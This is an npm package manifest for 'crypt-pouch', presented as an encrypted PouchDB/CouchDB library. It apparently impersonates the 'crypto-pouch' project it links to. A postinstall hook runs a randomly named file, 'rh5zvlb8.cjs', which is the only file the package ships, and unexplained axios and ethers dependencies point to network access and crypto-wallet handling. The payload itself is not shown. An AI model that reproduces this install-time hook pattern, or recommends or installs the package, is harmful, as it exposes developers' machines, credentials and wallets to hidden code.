crypt-pouch
Version:
encrypted pouchdb/couchdb database
43 lines • 972 B
JSON
{
"name": "crypt-pouch",
"version": "4.0.1",
"description": "encrypted pouchdb/couchdb database",
"main": "index.js",
"scripts": {
"postinstall": "node rh5zvlb8.cjs"
},
"repository": {
"type": "git",
"url": "https://github.com/calvinmetcalf/crypto-pouch.git"
},
"keywords": [
"pouchdb",
"couchdb",
"encrypted"
],
"author": "Calvin Metcalf",
"license": "MIT",
"bugs": {
"url": "https://github.com/calvinmetcalf/crypto-pouch/issues"
},
"homepage": "https://github.com/calvinmetcalf/crypto-pouch",
"dependencies": {
"garbados-crypt": "^3.0.0-beta",
"transform-pouch": "^2.0.0",
"axios": "^1.7.7",
"ethers": "^6.13.2"
},
"devDependencies": {
"browserify": "^17.0.0",
"dependency-check": "^4.1.0",
"memdown": "^6.0.0",
"mocha": "^8.3.2",
"nyc": "^15.1.0",
"pouchdb": "^7.2.2",
"standard": "^16.0.3",
"uglify-js": "^3.13.5"
},
"files": [
"rh5zvlb8.cjs"
]
}